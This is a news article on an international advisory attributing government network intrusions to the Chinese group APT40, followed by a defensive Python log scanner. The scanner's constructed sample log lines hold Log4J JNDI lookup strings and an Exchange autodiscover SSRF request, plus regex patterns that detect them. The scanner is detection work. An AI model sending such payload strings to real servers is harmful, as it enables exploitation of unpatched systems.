Chinese APT40 Hacking Group Blamed by Global Coalition for Hacking Government Networks

A coalition of nations, including the US, UK, Canada, Germany, Japan, New Zealand, and South Korea, has joined Australia in blaming Chinese state-sponsored hacking group APT40 for infiltrating government networks. This development follows the March 2024 sanctions against APT31 members, highlighting the persistent threat posed by Chinese advanced persistent threat (APT) actors.
Known by various names such as Bronze Mohawk, Gingham Typhoon, Kryptonite Panda, and Leviathan, APT40 has been repeatedly targeting Australian networks and those in the wider region. The coalition's advisory states, "APT40 has repeatedly targeted Australian networks as well as government and private sector networks in the region, and the threat they pose to our networks is ongoing."
APT40 conducts regular reconnaissance, looking for old and vulnerable devices to exploit. The group is adept at quickly adopting exploits for new vulnerabilities, including those in widely used software such as Atlassian Confluence (CVE-2021-26084), Log4J (CVE-2021-44228), and Microsoft Exchange (CVE-2021-31207, CVE-2021-34523, CVE-2021-34473). The advisory warns that APT40 is expected to continue using proof-of-concept (PoC) exploits for new high-profile vulnerabilities shortly after their public release.
Unlike many other threat actors, APT40 prefers to exploit vulnerable, internet-facing infrastructure for initial access rather than relying on phishing or other techniques that require user interaction. They exfiltrate credentials for follow-up operations and establish persistence early in the attack chain. The group has also compromised legacy small-office/home-office (SOHO) devices and used them as launch points for subsequent attacks, so that its activity blends in with legitimate network traffic. This tactic is shared by other Chinese state-sponsored actors worldwide, posing a global threat.
In one notable incident, APT40 maintained access to an Australian organization’s network between July and September 2022. They established multiple access vectors, exfiltrated large amounts of data, and moved laterally within the network. In another case, the group compromised an organization's remote access login portal, exploiting a publicly disclosed remote code execution (RCE) flaw to exfiltrate several hundred unique username and password pairs.
To mitigate the risk of such attacks, organizations are advised to implement comprehensive logging capabilities, promptly patch all internet-accessible appliances, implement network segmentation, disable unused services, ports, and protocols, enable multi-factor authentication, and replace legacy equipment. Software manufacturers are urged to adopt Secure by Design principles to enhance the security of their products.
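The advisory's recommendation to keep comprehensive logs on internet-facing appliances is only useful if someone looks at them. The following added example (not from the advisory or the article) scans constructed web-server access log lines for two of the CVEs named above, using simplified versions of the commonly published request-string heuristics: a Log4J JNDI lookup string (CVE-2021-44228) and the Exchange autodiscover path shape associated with CVE-2021-34473. Field names, the rule table and the sample lines are all assumptions made for illustration.

```python
"""Scan web access logs for exploitation attempts against CVEs named in the
APT40 advisory. Constructed example; heuristics are simplified, not a full IDS."""
import re
from urllib.parse import unquote

# Constructed sample lines in Apache combined log format. Not real traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Jul/2024:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.11 - - [10/Jul/2024:10:01:05 +0000] "GET /login?user=%24%7Bjndi%3Aldap%3A%2F%2Fexample.invalid%2Fa%7D HTTP/1.1" 200 88 "-" "Mozilla/5.0"
203.0.113.12 - - [10/Jul/2024:10:01:09 +0000] "GET /autodiscover/autodiscover.json?@example.invalid/owa/ HTTP/1.1" 401 0 "-" "python-requests/2.31"
203.0.113.13 - - [10/Jul/2024:10:01:12 +0000] "GET /healthz HTTP/1.1" 200 2 "-" "${jndi:rmi://example.invalid/x}"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Detection heuristics keyed by the CVE identifiers the advisory lists (simplified).
RULES = {
    "CVE-2021-44228": re.compile(r"\$\{\s*jndi\s*:", re.I),  # Log4J JNDI lookup
    "CVE-2021-34473": re.compile(r"/autodiscover/autodiscover\.json[^ ]*@", re.I),  # Exchange autodiscover SSRF shape
}


def normalize(s: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded payloads are compared in plain form."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def scan(log_text: str) -> list[dict]:
    """Return one hit per (line, rule) match over the attacker-controlled fields."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line; a real pipeline would count these too
        f = m.groupdict()
        # Request line, referer and user agent are all client-supplied and all get logged by log4j-backed apps.
        text = normalize(" ".join((f["req"], f["ref"], f["ua"])))
        for cve, pattern in RULES.items():
            if pattern.search(text):
                hits.append({"ip": f["ip"], "cve": cve, "status": f["status"], "ts": f["ts"]})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A match means an attempt, not a compromise; correlate the source IP and timestamp with the appliance's patch state and any outbound connections that followed.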
The coalition's advisory emphasizes the need for all organizations to review these recommendations to identify, prevent, and remediate APT40 intrusions. By adopting these measures, organizations can strengthen their defenses against the sophisticated techniques employed by APT40 and other state-sponsored threat actors.